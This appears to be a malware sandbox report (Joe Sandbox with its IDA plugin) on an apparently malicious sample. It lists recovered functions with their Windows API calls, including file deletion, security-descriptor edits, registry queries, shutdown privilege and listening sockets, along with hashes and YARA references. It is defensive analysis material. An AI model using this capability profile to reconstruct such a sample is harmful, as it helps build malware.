                                • _wcscmp.LIBCMT ref: 00CB21EC
                                  • Part of subcall function 00CA7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CA7621
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CB221B
                                • FindClose.KERNEL32(00000000), ref: 00CB2226
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00CB2242
                                • _wcscmp.LIBCMT ref: 00CB2269
                                • _wcscmp.LIBCMT ref: 00CB2280
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB2292
                                • SetCurrentDirectoryW.KERNEL32(00D13A68), ref: 00CB22B0
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CB22BA
                                • FindClose.KERNEL32(00000000), ref: 00CB22C7
                                • FindClose.KERNEL32(00000000), ref: 00CB22D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 1824444939-438819550
                                • Opcode ID: c4b1bfde9efc953bdd1a4c5ff3c912557c0da7ddf7ae9841657a9dd9dada6590
                                • Instruction ID: c59a4445a52fd61231374b61a86b886cd2b4794676cff2f39484887f91b68d67
                                • Opcode Fuzzy Hash: c4b1bfde9efc953bdd1a4c5ff3c912557c0da7ddf7ae9841657a9dd9dada6590
                                • Instruction Fuzzy Hash: AC319E7290121A7ECF24AFA4EC49FEE77AC9F45334F100165E821E6090DB70DF95DA6A
                                Function 00C66BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove_memset
                                • String ID: Q\E$[$\$\$\$]$^
                                • API String ID: 3555123492-286096704
                                • Opcode ID: bfa0b416b3d3f60a982ffd225e6e854e230d0e51a1481031a070d86ca3c132a5
                                • Instruction ID: 48a29e0a9117c871fae1b8599e99e5f2c939a38d72e123ac9da9e51503eac40e
                                • Opcode Fuzzy Hash: bfa0b416b3d3f60a982ffd225e6e854e230d0e51a1481031a070d86ca3c132a5
                                • Instruction Fuzzy Hash: 4B72BF71E04259DBDF24CF99C8806EDB7B1FF44314F2482A9D865AB381E774AE81DB90
                                Function 00C9B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
                                  • Part of subcall function 00C9B8E7: GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                  • Part of subcall function 00C9B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                  • Part of subcall function 00C9B8E7: HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                  • Part of subcall function 00C9B982: GetProcessHeap.KERNEL32(00000008,00C9B3E1,00000000,00000000,?,00C9B3E1,?), ref: 00C9B98E
                                  • Part of subcall function 00C9B982: HeapAlloc.KERNEL32(00000000,?,00C9B3E1,?), ref: 00C9B995
                                  • Part of subcall function 00C9B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C9B3E1,?), ref: 00C9B9A6
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9B3FC
                                • _memset.LIBCMT ref: 00C9B411
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9B430
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B441
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C9B47E
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C9B49A
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B4B7
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C9B4C6
                                • HeapAlloc.KERNEL32(00000000), ref: 00C9B4CD
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9B4EE
                                • CopySid.ADVAPI32(00000000), ref: 00C9B4F5
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9B526
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C9B54C
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C9B560
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                • Opcode ID: 345d9aedede6bd69e57a4575f715c7f111f201a346210548b56f9ace30b18b73
                                • Instruction ID: bdc5205e38111382050f233824e450fd71ac6c653e7e5d6a087a5a0d933eec61
                                • Opcode Fuzzy Hash: 345d9aedede6bd69e57a4575f715c7f111f201a346210548b56f9ace30b18b73
                                • Instruction Fuzzy Hash: 94513C7190020ABFDF10DF94ED89AEEBB79BF04710F048159F925AA291D7319E05DB60
                                Function 00CA6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00CA7C0C: GetFileAttributesW.KERNEL32(?,00CA6A7B), ref: 00CA7C0D
                                • _wcscat.LIBCMT ref: 00CA6E7E
                                • __wsplitpath.LIBCMT ref: 00CA6E99
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CA6EAE
                                • _wcscpy.LIBCMT ref: 00CA6EDD
                                • _wcscat.LIBCMT ref: 00CA6EEF
                                • _wcscat.LIBCMT ref: 00CA6F01
                                • DeleteFileW.KERNEL32(?), ref: 00CA6F0E
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA6F22
                                • FindClose.KERNEL32(00000000), ref: 00CA6F3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                • String ID: \*.*
                                • API String ID: 2643075503-1173974218
                                • Opcode ID: 2e1937523ed20545ac7ca7c5e85aee86421600c15921df69c15ed0115b64eb48
                                • Instruction ID: 00ecf0aea4dee19c972c847a9f727b8d47842d84facc8cb58a389d48454307df
                                • Opcode Fuzzy Hash: 2e1937523ed20545ac7ca7c5e85aee86421600c15921df69c15ed0115b64eb48
                                • Instruction Fuzzy Hash: C821C572408385AEC710EBA0DC85ADF77DC5F5A228F084A1AF5E5C3051EA34D64D87A2
                                Function 00CC30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC317F
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CC321E
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CC32B6
                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CC34F5
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC3502
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                • String ID:
                                • API String ID: 1240663315-0
                                • Opcode ID: fcdb2bf9dd0973f28835e6e43ec30552144731db8a64fea37e4c095c8f125685
                                • Instruction ID: 98cfef629afd3abba6336f7d95085667f867925dca0198e54fd05e2a256624ec
                                • Opcode Fuzzy Hash: fcdb2bf9dd0973f28835e6e43ec30552144731db8a64fea37e4c095c8f125685
                                • Instruction Fuzzy Hash: 4DE16C31204250AFCB15DF29C895E2ABBE8EF89314F04C96DF45ADB2A1DB31EE05DB51
                                Function 00CB7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                • Opcode ID: f37d052e6b4ff90ae88c7d7ab478b5c5cd7658d523e42160c03e0fcdfd1674a1
                                • Instruction ID: 84dfba99d987823dba26f368d4a5ca71e4699ff54d596adfa5e6593a79f1eeab
                                • Opcode Fuzzy Hash: f37d052e6b4ff90ae88c7d7ab478b5c5cd7658d523e42160c03e0fcdfd1674a1
                                • Instruction Fuzzy Hash: F621AE31244211AFDB10AF25DC99B6D7BE8EF54720F008419FD5ADF2A1DB34ED419B94
                                Function 00CBC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9A857: CLSIDFromProgID.OLE32 ref: 00C9A874
                                  • Part of subcall function 00C9A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C9A88F
                                  • Part of subcall function 00C9A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00C9A89D
                                  • Part of subcall function 00C9A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C9A8AD
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CBC6AD
                                • _memset.LIBCMT ref: 00CBC6BA
                                • _memset.LIBCMT ref: 00CBC7D8
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00CBC804
                                • CoTaskMemFree.OLE32(?), ref: 00CBC80F
                                Strings
                                • NULL Pointer assignment, xrefs: 00CBC85D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                • String ID: NULL Pointer assignment
                                • API String ID: 1300414916-2785691316
                                • Opcode ID: 7662906a474063f73adbf3977363e61fcd6aba4a8428e8dcbbb87d9e5306ee28
                                • Instruction ID: 17b65f40d3435bea6fd2eebfaad0de43db461ceb6f8e5b60f835449acf6cb348
                                • Opcode Fuzzy Hash: 7662906a474063f73adbf3977363e61fcd6aba4a8428e8dcbbb87d9e5306ee28
                                • Instruction Fuzzy Hash: 68915C71D00228AFDB20DFA4DC85EDEBBB9EF08710F20416AF519A7291DB715A45CFA0
                                Function 00CB24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CB24F6
                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CB2526
                                • _wcscmp.LIBCMT ref: 00CB253A
                                • _wcscmp.LIBCMT ref: 00CB2555
                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CB25F3
                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CB2609
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                • String ID: *.*
                                • API String ID: 713712311-438819550
                                • Opcode ID: dff1ab335b72a8b18d8830e5866d4e242ab004c8b038d5924a229c9eb665c838
                                • Instruction ID: baac34a5341874f660360f17284ce2c4e13e54a22b1083d653e88e13569c3033
                                • Opcode Fuzzy Hash: dff1ab335b72a8b18d8830e5866d4e242ab004c8b038d5924a229c9eb665c838
                                • Instruction Fuzzy Hash: 5541737190421AAFCF24EFA4CC99AEEBBB4FF09310F144456F425A6191E7309B95DF50
                                Function 00C68CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                • API String ID: 0-1546025612
                                • Opcode ID: e57aa912fdfbda2387ab1d8df151ba9e30ada02db6c5870465521ff923d50534
                                • Instruction ID: 7e3a3199f6cc3d4e902d4070a0ae9554279176c4f9ddc20bb10341911de04cfb
                                • Opcode Fuzzy Hash: e57aa912fdfbda2387ab1d8df151ba9e30ada02db6c5870465521ff923d50534
                                • Instruction Fuzzy Hash: 27927D75E0025ACBDF34CF59C8C07ADB7B5FB54314F2442AAE826AB280D7709E86DB51
                                Function 00C68530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 2cfb1313bbaf4b0910727ecc251bdecf80be404f57fea1a803c2104d66841da6
                                • Instruction ID: a150029b199ef908b054a1516a9693e8ca2c6fe347f4d0bbd7bc65442f4672ce
                                • Opcode Fuzzy Hash: 2cfb1313bbaf4b0910727ecc251bdecf80be404f57fea1a803c2104d66841da6
                                • Instruction Fuzzy Hash: DF128E70A00609EFDF14DFA5C981AAEB3F5FF48300F20856AE456E7251EB35AE15DB60
                                Function 00CA82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C9BF0F
                                  • Part of subcall function 00C9BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C9BF3C
                                  • Part of subcall function 00C9BEC3: GetLastError.KERNEL32 ref: 00C9BF49
                                • ExitWindowsEx.USER32(?,00000000), ref: 00CA830C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                • String ID: $@$SeShutdownPrivilege
                                • API String ID: 2234035333-194228
                                • Opcode ID: cb83bfe59653ffbcfd80bf29290a4cf0926afd3cfc0c899991edcc5fc6a3a408
                                • Instruction ID: 2e8380c3e6789db65d0bcaf95cb82fa1a2242fbe2eaee0ec7c99a96466376470
                                • Opcode Fuzzy Hash: cb83bfe59653ffbcfd80bf29290a4cf0926afd3cfc0c899991edcc5fc6a3a408
                                • Instruction Fuzzy Hash: 9101DB72752313BBFF6816789C8BBBB7658EB06F89F140424FA53D60E1DE609D0891A4
                                Function 00CB91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CB9235
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9244
                                • bind.WSOCK32(00000000,?,00000010), ref: 00CB9260
                                • listen.WSOCK32(00000000,00000005), ref: 00CB926F
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9289
                                • closesocket.WSOCK32(00000000,00000000), ref: 00CB929D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast$bindclosesocketlistensocket
                                • String ID:
                                • API String ID: 1279440585-0
                                • Opcode ID: 5aac97a7921940bbfcf9707654fb778c7bd3070f5712a24eba3fc20a36446dc6
                                • Instruction ID: 6f81d7350d9e2a1a2cc5975279424847371428cc88af8f7b5079bd425332624b
                                • Opcode Fuzzy Hash: 5aac97a7921940bbfcf9707654fb778c7bd3070f5712a24eba3fc20a36446dc6
                                • Instruction Fuzzy Hash: 4B218D35A00211AFCB10EF64CC85BAEB7A9EF45324F108159FA67AB391CB30AD41DB52
                                Function 00CA6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CA6F7D
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CA6F8D
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00CA6FAC
                                • __wsplitpath.LIBCMT ref: 00CA6FD0
                                • _wcscat.LIBCMT ref: 00CA6FE3
                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CA7022
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                • String ID:
                                • API String ID: 1605983538-0
                                • Opcode ID: 6b111237110031af998b1f7317f5120c6505d194f7b2bcbd16d7139ec6ddc834
                                • Instruction ID: 874c13bd1adb4ae3f5a3d1fd47730d80b5d83a378bbe59313519867b2a0e31e5
                                • Opcode Fuzzy Hash: 6b111237110031af998b1f7317f5120c6505d194f7b2bcbd16d7139ec6ddc834
                                • Instruction Fuzzy Hash: 42219271904259AFDB10ABA0CC88BEEB7BCAB09318F1004A9F505E7141E7759F84DB60
                                Function 00C6A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _memmove.LIBCMT ref: 00CD3020
                                • _memmove.LIBCMT ref: 00CD3135
                                • _memmove.LIBCMT ref: 00CD31DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID:
                                • API String ID: 1300846289-0
                                • Opcode ID: 8a1151e2f66f99b97348f8166737897b0107aabb83033987a55e6f1b41fd5e2b
                                • Instruction ID: d4b013b6d0eac6f197cf14b634d07f8e9a06039645632ad08a33d5401add705e
                                • Opcode Fuzzy Hash: 8a1151e2f66f99b97348f8166737897b0107aabb83033987a55e6f1b41fd5e2b
                                • Instruction Fuzzy Hash: E302A070A00209DFDF14DF65C981AAEB7F5EF48300F14806AE80AEB355EB31DA55DB95
                                Function 00CB96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CBACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00CB973D
                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00CB9760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
